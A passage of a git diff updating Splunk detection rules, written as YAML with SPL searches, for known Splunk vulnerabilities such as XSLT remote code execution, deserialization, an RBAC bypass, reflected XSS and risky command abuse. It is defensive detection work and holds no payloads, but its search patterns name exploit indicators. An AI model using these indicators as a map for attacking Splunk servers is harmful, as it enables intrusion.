- https://advisory.splunk.com/
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Endpoint
|
||||
atomic_guid: []
|
||||
confidence: 80
|
||||
impact: 80
|
||||
cve:
|
||||
- CVE-2023-32707
|
||||
message: Possible attempt to abuse edit_user function by $user$
|
||||
message: Possible attempt to abuse edit_user function by $user$
|
||||
mitre_attack_id:
|
||||
- T1548
|
||||
observable:
|
||||
@@ -36,15 +50,16 @@ tags:
|
||||
- Splunk Cloud
|
||||
risk_score: 64
|
||||
required_fields:
|
||||
- user
|
||||
- action
|
||||
- info
|
||||
- _time
|
||||
- user
|
||||
- action
|
||||
- info
|
||||
- _time
|
||||
security_domain: endpoint
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_edit_user_privilege_escalation.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_edit_user_privilege_escalation.log
|
||||
source: audittrail
|
||||
sourcetype: audittrail
|
||||
custom_index: _audit
|
||||
|
||||
+30
-20
@@ -1,22 +1,30 @@
|
||||
name: Splunk Enterprise Windows Deserialization File Partition
|
||||
id: 947d4d2e-1b64-41fc-b32a-736ddb88ce97
|
||||
version: 1
|
||||
date: '2024-01-18'
|
||||
version: 2
|
||||
date: '2024-05-18'
|
||||
author: Rod Soto, Eric McGinnis, Chase Franklin
|
||||
status: production
|
||||
type: TTP
|
||||
data_source:
|
||||
data_source:
|
||||
- Splunk
|
||||
description: In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows.
|
||||
search: '`splunk_python` request_path="/en-US/app/search/C:\\Program" *strings*
|
||||
| rex "request_path=(?<file_path>[^\"]+)"
|
||||
| rex field=file_path "[^\"]+/(?<file_name>[^\"\''\s/\\\\]+)"
|
||||
| stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path values(file_name) as file_name by index, sourcetype, host
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `splunk_enterprise_windows_deserialization_file_partition_filter`'
|
||||
how_to_implement: Requires access to internal indexes. This detection search will display irregular path file execution, which will display exploit attempts. Only applies to Microsoft Windows Splunk versions.
|
||||
known_false_positives: Irregular path with files that may be purposely called for benign reasons may produce false positives.
|
||||
description: The following analytic identifies attempts to exploit a deserialization
|
||||
vulnerability in Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3. It
|
||||
detects irregular path file executions by analyzing `splunk_python` logs and extracting
|
||||
file paths and names. This activity is significant because it indicates potential
|
||||
exploitation of a known vulnerability, which could lead to arbitrary code execution.
|
||||
If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary
|
||||
code, and potentially compromise the entire Splunk environment, leading to data
|
||||
breaches and further system exploitation.
|
||||
search: '`splunk_python` request_path="/en-US/app/search/C:\\Program" *strings* |
|
||||
rex "request_path=(?<file_path>[^\"]+)" | rex field=file_path "[^\"]+/(?<file_name>[^\"\''\s/\\\\]+)"
|
||||
| stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path
|
||||
values(file_name) as file_name by index, sourcetype, host | `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)` | `splunk_enterprise_windows_deserialization_file_partition_filter`'
|
||||
how_to_implement: Requires access to internal indexes. This detection search will
|
||||
display irregular path file execution, which will display exploit attempts. Only
|
||||
applies to Microsoft Windows Splunk versions.
|
||||
known_false_positives: Irregular path with files that may be purposely called for
|
||||
benign reasons may produce false positives.
|
||||
references:
|
||||
- https://advisory.splunk.com/advisories/SVD-2024-0108
|
||||
tags:
|
||||
@@ -25,7 +33,8 @@ tags:
|
||||
asset_type: Splunk Server
|
||||
confidence: 90
|
||||
impact: 100
|
||||
message: Possible Windows Deserialization exploitation via irregular path file against $host$
|
||||
message: Possible Windows Deserialization exploitation via irregular path file against
|
||||
$host$
|
||||
mitre_attack_id:
|
||||
- T1190
|
||||
cve:
|
||||
@@ -40,14 +49,15 @@ tags:
|
||||
risk_score: 90
|
||||
required_fields:
|
||||
- request_path
|
||||
- field
|
||||
- file_name
|
||||
- field
|
||||
- file_name
|
||||
- host
|
||||
security_domain: endpoint
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/splunk/splunk_enterprise_windows_deserialization_file_partition_splunk_python.log
|
||||
source: C:\Program File\Splunk\var\log\splunk\python.log
|
||||
sourcetype: splunk_python
|
||||
custom_index: _internal
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/splunk/splunk_enterprise_windows_deserialization_file_partition_splunk_python.log
|
||||
source: C:\Program File\Splunk\var\log\splunk\python.log
|
||||
sourcetype: splunk_python
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,20 +1,26 @@
|
||||
name: Splunk Improperly Formatted Parameter Crashes splunkd
|
||||
id: 08978eca-caff-44c1-84dc-53f17def4e14
|
||||
version: 1
|
||||
date: '2023-02-14'
|
||||
version: 2
|
||||
date: '2024-05-14'
|
||||
author: Chase Franklin, Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the
|
||||
INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting
|
||||
search provides the user, timing and number of times the crashing command was executed.
|
||||
description: The following analytic detects the execution of improperly formatted
|
||||
INGEST_EVAL parameters in Splunk Enterprise, which can crash the splunkd service.
|
||||
It leverages the Splunk_Audit.Search_Activity datamodel to identify ad-hoc searches
|
||||
containing specific keywords. This activity is significant because it can disrupt
|
||||
Splunk operations, leading to potential data loss and service downtime. If confirmed
|
||||
malicious, an attacker could exploit this to cause a denial of service, impacting
|
||||
the availability and reliability of the Splunk environment.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
|
||||
from datamodel=Splunk_Audit.Search_Activity
|
||||
where (Search_Activity.search="*makeresults*"AND Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*" Search_Activity.user!=splunk-system-user
|
||||
by Search_Activity.search, Search_Activity.info, Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type
|
||||
| `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter`'
|
||||
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
|
||||
as lastTime from datamodel=Splunk_Audit.Search_Activity where (Search_Activity.search="*makeresults*"AND
|
||||
Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc
|
||||
Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*"
|
||||
Search_Activity.user!=splunk-system-user by Search_Activity.search, Search_Activity.info,
|
||||
Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type
|
||||
| `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` |
|
||||
`security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter`'
|
||||
how_to_implement: Requires access to audittrail and use of Splunk_Audit.Search_Activity
|
||||
datamodel.
|
||||
known_false_positives: This is a hunting search it should be focused on affected products,
|
||||
|
||||
@@ -1,27 +1,40 @@
|
||||
name: Splunk Information Disclosure in Splunk Add-on Builder
|
||||
id: b7b82980-4a3e-412e-8661-4531d8758735
|
||||
version: 1
|
||||
date: '2024-01-30'
|
||||
version: 2
|
||||
date: '2024-05-20'
|
||||
author: Rod Soto, Eric McGinnis
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
data_source:
|
||||
- Splunk
|
||||
description: In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.
|
||||
search: '| rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on Builder" | dedup label | search version < 4.1.4
|
||||
| eval WarningMessage="Splunk Add-on Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability, please refer to https://advisory.splunk.com/advisories/SVD-2024-0111"
|
||||
| table label version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter`'
|
||||
how_to_implement: This search should be run on search heads where Splunk Add-on Builder may be installed. The results of this search will conclusively show whether or not a vulnerable version of Splunk Add-on Builder is currently installed.
|
||||
known_false_positives: This search is highly specific for vulnerable versions of Splunk Add-on Builder. There are no known false positives.
|
||||
description: The following analytic identifies the presence of vulnerable versions
|
||||
of Splunk Add-on Builder (below 4.1.4) that write sensitive information to internal
|
||||
log files. It uses REST API queries to check installed app versions and flags those
|
||||
below the secure threshold. This activity is significant because it exposes sensitive
|
||||
data, which could be exploited by attackers. If confirmed malicious, this vulnerability
|
||||
could lead to unauthorized access to sensitive information, compromising the security
|
||||
and integrity of the Splunk environment. Immediate updates to version 4.1.4 or higher
|
||||
are recommended.
|
||||
search: '| rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on
|
||||
Builder" | dedup label | search version < 4.1.4 | eval WarningMessage="Splunk Add-on
|
||||
Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk
|
||||
Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability,
|
||||
please refer to https://advisory.splunk.com/advisories/SVD-2024-0111" | table label
|
||||
version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter`'
|
||||
how_to_implement: This search should be run on search heads where Splunk Add-on Builder
|
||||
may be installed. The results of this search will conclusively show whether or
|
||||
not a vulnerable version of Splunk Add-on Builder is currently installed.
|
||||
known_false_positives: This search is highly specific for vulnerable versions of Splunk
|
||||
Add-on Builder. There are no known false positives.
|
||||
references:
|
||||
- https://advisory.splunk.com/advisories/SVD-2024-0111
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Splunk Server
|
||||
asset_type: Splunk Server
|
||||
confidence: 100
|
||||
impact: 100
|
||||
message: Vulnerable $version$ of Splunk Add-on Builder found - Upgrade Immediately.
|
||||
message: Vulnerable $version$ of Splunk Add-on Builder found - Upgrade Immediately.
|
||||
mitre_attack_id:
|
||||
- T1082
|
||||
observable:
|
||||
@@ -34,10 +47,11 @@ tags:
|
||||
risk_score: 100
|
||||
required_fields:
|
||||
- disabled
|
||||
- core
|
||||
- core
|
||||
- version
|
||||
- label
|
||||
security_domain: endpoint
|
||||
manual_test: This search uses a REST call against a running Splunk instance to fetch the versions of installed apps.
|
||||
It cannot be replicated with a normal test or attack data.
|
||||
manual_test: This search uses a REST call against a running Splunk instance to fetch
|
||||
the versions of installed apps. It cannot be replicated with a normal test or
|
||||
attack data.
|
||||
|
||||
|
||||
+12
-7
@@ -1,14 +1,18 @@
|
||||
name: Splunk protocol impersonation weak encryption selfsigned
|
||||
id: c76c7a2e-df49-414a-bb36-dce2683770de
|
||||
version: 1
|
||||
date: '2022-05-26'
|
||||
version: 2
|
||||
date: '2024-05-21'
|
||||
author: Rod Soto, Splunk
|
||||
status: production
|
||||
type: Hunting
|
||||
description: On June 14th 2022, Splunk released vulnerability advisory addresing Python
|
||||
TLS validation which was not set before Splunk version 9. This search displays events
|
||||
showing WARNING of using Splunk issued default selfsigned certificates.
|
||||
data_source:
|
||||
description: The following analytic identifies the use of Splunk's default self-signed
|
||||
certificates, which are flagged as insecure. It detects events from the `splunkd`
|
||||
log where the event message indicates that an X509 certificate should not be used.
|
||||
This activity is significant because using weak encryption and self-signed certificates
|
||||
can expose the system to man-in-the-middle attacks and other security vulnerabilities.
|
||||
If confirmed malicious, attackers could impersonate Splunk services, intercept sensitive
|
||||
data, and compromise the integrity of the Splunk environment.
|
||||
data_source:
|
||||
- Splunk
|
||||
search: '`splunkd` certificate event_message="X509 certificate* should not be used*"
|
||||
| stats count by host CN component log_level | `splunk_protocol_impersonation_weak_encryption_selfsigned_filter`'
|
||||
@@ -54,7 +58,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splunk_protocol_impersonation_weak_encryption_selfsigned.txt
|
||||
- data:
|
||||
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splunk_protocol_impersonation_weak_encryption_selfsigned.txt
|
||||
source: /opt/splun/var/log/splunk/splunkd.log
|
||||
sourcetype: splunkd
|
||||
custom_index: _internal
|
||||
|
||||
+13
-7
@@ -1,14 +1,19 @@
|
||||
name: Splunk protocol impersonation weak encryption simplerequest
|
||||
id: 839d12a6-b119-4d44-ac4f-13eed95412c8
|
||||
version: 1
|
||||
date: '2022-05-24'
|
||||
version: 2
|
||||
date: '2024-05-23'
|
||||
author: Rod Soto, Splunk
|
||||
status: production
|
||||
type: Hunting
|
||||
description: On Splunk version 9 on Python3 client libraries verify server certificates
|
||||
by default and use CA certificate store. This search warns a user about a failure
|
||||
to validate a certificate using python3 request.
|
||||
data_source:
|
||||
description: The following analytic identifies instances where Splunk's Python3 client
|
||||
libraries fail to validate SSL certificates properly. It leverages logs from `splunk_python`
|
||||
to detect when "simpleRequest SSL certificate validation is enabled without hostname
|
||||
verification." This activity is significant because improper SSL certificate validation
|
||||
can expose the system to man-in-the-middle attacks, allowing attackers to intercept
|
||||
or alter data. If confirmed malicious, this vulnerability could lead to unauthorized
|
||||
access, data breaches, and potential system compromise. Upgrading to Splunk version
|
||||
9 and configuring TLS hostname validation is recommended to mitigate this risk.
|
||||
data_source:
|
||||
- Splunk
|
||||
search: '`splunk_python` "simpleRequest SSL certificate validation is enabled without
|
||||
hostname verification" | stats count by host path | `splunk_protocol_impersonation_weak_encryption_simplerequest_filter`'
|
||||
@@ -56,7 +61,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splk_protocol_impersonation_weak_encryption_simplerequest.txt
|
||||
- data:
|
||||
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splk_protocol_impersonation_weak_encryption_simplerequest.txt
|
||||
source: /opt/splunk/var/log/splunk/splunkd.log
|
||||
sourcetype: splunk_python
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,48 +1,60 @@
|
||||
name: Splunk RBAC Bypass On Indexing Preview REST Endpoint
|
||||
id: bbe26f95-1655-471d-8abd-3d32fafa86f8
|
||||
version: 1
|
||||
date: '2023-05-10'
|
||||
version: 2
|
||||
date: '2024-05-15'
|
||||
author: Rod Soto
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
- Splunk
|
||||
description: An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job.
|
||||
search: '`splunkda` method="POST" uri="*/services/indexing/preview*" | table host clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter`'
|
||||
how_to_implement: This search does not require additional data ingestion. It requires the ability to search _internal index.
|
||||
known_false_positives: This is a hunting search which provides verbose results against this endpoint. Operator must consider things such as IP address, useragent and user(specially low privelege) and host to investigate possible attack.
|
||||
description: The following analytic identifies unauthorized attempts to use the /services/indexing/preview
|
||||
REST endpoint in Splunk. It detects POST requests to this endpoint by monitoring
|
||||
the _internal index for specific URI patterns. This activity is significant because
|
||||
it indicates a potential RBAC (Role-Based Access Control) bypass, allowing unauthorized
|
||||
users to overwrite search results if they know the search ID (SID) of an existing
|
||||
job. If confirmed malicious, this could lead to data manipulation, unauthorized
|
||||
access to sensitive information, and compromised integrity of search results.
|
||||
search: '`splunkda` method="POST" uri="*/services/indexing/preview*" | table host
|
||||
clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter`'
|
||||
how_to_implement: This search does not require additional data ingestion. It requires
|
||||
the ability to search _internal index.
|
||||
known_false_positives: This is a hunting search which provides verbose results against
|
||||
this endpoint. Operator must consider things such as IP address, useragent and user(specially
|
||||
low privelege) and host to investigate possible attack.
|
||||
references:
|
||||
- https://advisory.splunk.com/
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Endpoint
|
||||
atomic_guid: []
|
||||
confidence: 50
|
||||
impact: 30
|
||||
message: Review $clientip$ access to indexing preview endpoint from low privilege user
|
||||
message: Review $clientip$ access to indexing preview endpoint from low privilege
|
||||
user
|
||||
mitre_attack_id:
|
||||
- T1134
|
||||
observable:
|
||||
- name: clientip
|
||||
type: IP Address
|
||||
role:
|
||||
- Attacker
|
||||
- Attacker
|
||||
product:
|
||||
- Splunk Enterprise
|
||||
risk_score: 15
|
||||
required_fields:
|
||||
- host
|
||||
- clientip
|
||||
- status
|
||||
- useragent
|
||||
- user
|
||||
- uri_path
|
||||
- host
|
||||
- clientip
|
||||
- status
|
||||
- useragent
|
||||
- user
|
||||
- uri_path
|
||||
security_domain: endpoint
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1134/splunk/splunk_rbac_bypass_on_indexing_preview_rest_endpoint.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1134/splunk/splunk_rbac_bypass_on_indexing_preview_rest_endpoint.log
|
||||
source: splunkd_access.log
|
||||
sourcetype: splunkd_access
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,64 +1,68 @@
|
||||
name: Splunk RCE via User XSLT
|
||||
id: 6cb7e011-55fb-48e3-a98d-164fa854e37e
|
||||
version: 1
|
||||
date: '2023-11-22'
|
||||
version: 2
|
||||
date: '2024-05-16'
|
||||
author: Marissa Bower, Chase Franklin, Rod Soto, Bhavin Patel, Eric McGinnis, Splunk
|
||||
status: production
|
||||
type: Hunting
|
||||
data_source:
|
||||
- Splunk
|
||||
description: This search provides information to investigate possible remote code execution exploitation via
|
||||
user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
|
||||
search: '`splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*") AND uri!= "*splunkd_ui*"
|
||||
| rex field=uri "(?<string>=\s*([\S\s]+))"
|
||||
| eval decoded_field=urldecode(string)
|
||||
| eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown")
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent uri decoded_field action host
|
||||
| rename clientip as src, uri as dest_uri
|
||||
| iplocation src
|
||||
| fillnull value="N/A"
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| table firstTime, lastTime src, useragent, action, count, Country, Region, City, dest_uri, decoded_field'
|
||||
how_to_implement: This detection does not require you to ingest any new data. The detection does
|
||||
require the ability to search the _internal index.
|
||||
known_false_positives: This search will provide information for investigation and hunting possible abuse of user-supplied XSLT.
|
||||
There may be false positives and results should individually evaluated. Please evaluate the source IP and useragent responsible
|
||||
data_source: []
|
||||
description: The following analytic identifies potential remote code execution (RCE)
|
||||
attempts via user-supplied Extensible Stylesheet Language Transformations (XSLT)
|
||||
in Splunk versions 9.1.x. It detects this activity by analyzing `splunkd_ui` logs
|
||||
for specific URI patterns and status codes indicative of XSLT injection attempts.
|
||||
This activity is significant because successful exploitation could allow an attacker
|
||||
to execute arbitrary code on the Splunk server. If confirmed malicious, this could
|
||||
lead to full system compromise, unauthorized data access, and further lateral movement
|
||||
within the network.
|
||||
search: '`splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*")
|
||||
AND uri!= "*splunkd_ui*" | rex field=uri "(?<string>=\s*([\S\s]+))" | eval decoded_field=urldecode(string)
|
||||
| eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown")
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent
|
||||
uri decoded_field action host | rename clientip as src, uri as dest_uri | iplocation
|
||||
src | fillnull value="N/A" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
||||
| table firstTime, lastTime src, useragent, action, count, Country, Region, City,
|
||||
dest_uri, decoded_field'
|
||||
how_to_implement: This detection does not require you to ingest any new data. The
|
||||
detection does require the ability to search the _internal index.
|
||||
known_false_positives: This search will provide information for investigation and
|
||||
hunting possible abuse of user-supplied XSLT. There may be false positives and results
|
||||
should individually evaluated. Please evaluate the source IP and useragent responsible
|
||||
for creating the requests.
|
||||
references:
|
||||
- https://advisory.splunk.com/advisories/SVD-2023-1104
|
||||
cve:
|
||||
- CVE-2023-46214
|
||||
- https://advisory.splunk.com/advisories/SVD-2023-1104
|
||||
cve:
|
||||
- CVE-2023-46214
|
||||
tags:
|
||||
analytic_story:
|
||||
- Splunk Vulnerabilities
|
||||
- Splunk Vulnerabilities
|
||||
asset_type: Endpoint
|
||||
confidence: 80
|
||||
impact: 80
|
||||
message: Potential Remote Code Execution via XLST from $src$ using useragent - $useragent$
|
||||
mitre_attack_id:
|
||||
- T1210
|
||||
- T1210
|
||||
observable:
|
||||
- name: src
|
||||
type: IP Address
|
||||
role:
|
||||
- Attacker
|
||||
- name: src
|
||||
type: IP Address
|
||||
role:
|
||||
- Attacker
|
||||
product:
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
risk_score: 64
|
||||
required_fields:
|
||||
- uri
|
||||
- clientip
|
||||
- useragent
|
||||
- action
|
||||
- host
|
||||
- uri
|
||||
- clientip
|
||||
- useragent
|
||||
- action
|
||||
- host
|
||||
security_domain: endpoint
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1210/splunk/splunk_rce_via_user_xslt_splunkd_ui_access.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1210/splunk/splunk_rce_via_user_xslt_splunkd_ui_access.log
|
||||
source: /opt/splunk/var/log/splunk/splunkd_ui_access.log
|
||||
sourcetype: splunkd_ui_access
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
name: Splunk Reflected XSS in the templates lists radio
|
||||
id: d532d105-c63f-4049-a8c4-e249127ca425
|
||||
version: 1
|
||||
date: '2022-10-11'
|
||||
version: 2
|
||||
date: '2024-05-23'
|
||||
author: Rod Soto, Chase Franklin
|
||||
status: production
|
||||
type: Hunting
|
||||
description: Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected
|
||||
cross site scripting (XSS). A View allows for a Reflected Cross Site scripting via
|
||||
JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio.
|
||||
data_source:
|
||||
description: The following analytic identifies potential reflected cross-site scripting
|
||||
(XSS) attempts in Splunk versions below 8.1.12, 8.2.9, and 9.0.2. It detects when
|
||||
a query parameter with `output_mode=radio` is used in a URI, leveraging `splunkd_webx`
|
||||
logs with status 200 and non-null URI queries. This activity is significant as it
|
||||
can indicate an attempt to exploit a known vulnerability, potentially allowing attackers
|
||||
to execute arbitrary JavaScript in the context of the user's browser. If confirmed
|
||||
malicious, this could lead to unauthorized actions, data theft, or further compromise
|
||||
of the affected Splunk instance.
|
||||
data_source:
|
||||
- Splunk
|
||||
search: '`splunkd_webx` user=admin status=200 uri=*/lists/entities/x/ui/views* uri_query!=null
|
||||
| stats count earliest(_time) as event_time values(status) as status values(clientip)
|
||||
@@ -55,7 +60,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1189/splunk/splunk_reflected_xss_in_templates_lists_radio.txt
|
||||
- data:
|
||||
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1189/splunk/splunk_reflected_xss_in_templates_lists_radio.txt
|
||||
source: /opt/splunk/var/log/splunk/web_access.log
|
||||
sourcetype: splunk_web_access
|
||||
custom_index: _internal
|
||||
|
||||
@@ -1,24 +1,28 @@
|
||||
name: Splunk risky Command Abuse disclosed february 2023
|
||||
id: ee69374a-d27e-4136-adac-956a96ff60fd
|
||||
version: 2
|
||||
date: '2024-01-22'
|
||||
version: 3
|
||||
date: '2024-05-05'
|
||||
author: Chase Franklin, Rod Soto, Eric McGinnis, Splunk
|
||||
status: production
|
||||
type: Hunting
|
||||
description: This search looks for a variety of high-risk commands throughout
|
||||
a number of different Splunk Vulnerability Disclosures. Please refer to the
|
||||
following URL for additional information on these disclosures - https://advisory.splunk.com
|
||||
data_source:
|
||||
description: The following analytic identifies the execution of high-risk commands
|
||||
associated with various Splunk vulnerability disclosures. It leverages the Splunk_Audit.Search_Activity
|
||||
datamodel to detect ad-hoc searches by non-system users that match known risky commands.
|
||||
This activity is significant for a SOC as it may indicate attempts to exploit known
|
||||
vulnerabilities within Splunk, potentially leading to unauthorized access or data
|
||||
exfiltration. If confirmed malicious, this could allow attackers to execute arbitrary
|
||||
code, escalate privileges, or persist within the environment, posing a severe threat
|
||||
to the organization's security posture.
|
||||
data_source:
|
||||
- Splunk
|
||||
search: '| tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity
|
||||
where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user
|
||||
by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user
|
||||
Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command
|
||||
splunk_risky_command as search output splunk_risky_command description vulnerable_versions
|
||||
CVE other_metadata | where splunk_risky_command != "false"
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `splunk_risky_command_abuse_disclosed_february_2023_filter`'
|
||||
search: '| tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as
|
||||
lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc
|
||||
Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info
|
||||
Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type
|
||||
| `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command splunk_risky_command
|
||||
as search output splunk_risky_command description vulnerable_versions CVE other_metadata
|
||||
| where splunk_risky_command != "false" | `security_content_ctime(firstTime)` |
|
||||
`security_content_ctime(lastTime)` | `splunk_risky_command_abuse_disclosed_february_2023_filter`'
|
||||
how_to_implement: Requires implementation of Splunk_Audit.Search_Activity datamodel.
|
||||
known_false_positives: This search encompasses many commands.
|
||||
references:
|
||||
@@ -68,25 +72,29 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_createrss_command_abuse.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_createrss_command_abuse.log
|
||||
source: audittrail
|
||||
sourcetype: audittrail
|
||||
custom_index: _audit
|
||||
- name: True Positive Test runshellscript abuse
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_runshellscript_abuse.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_runshellscript_abuse.log
|
||||
source: audittrail
|
||||
sourcetype: audittrail
|
||||
custom_index: _audit
|
||||
- name: True Positive Test Additional runshellscript abuse
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1202/splunk/splunk_cmd_injection_using_external_lookups_audittrail.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1202/splunk/splunk_cmd_injection_using_external_lookups_audittrail.log
|
||||
source: audittrail
|
||||
sourcetype: audittrail
|
||||
custom_index: _audit
|
||||
- name: True Positive Test mrollup abuse
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059/splunk/splunk_mrollup_abuse_audittrail.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059/splunk/splunk_mrollup_abuse_audittrail.log
|
||||
source: audittrail
|
||||
sourcetype: audittrail
|
||||
custom_index: _audit
|
||||
custom_index: _audit
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: Suspicious Java Classes
|
||||
id: 6ed33786-5e87-4f55-b62c-cb5f1168b831
|
||||
version: 1
|
||||
date: '2018-12-06'
|
||||
version: 2
|
||||
date: '2024-05-19'
|
||||
author: Jose Hernandez, Splunk
|
||||
status: experimental
|
||||
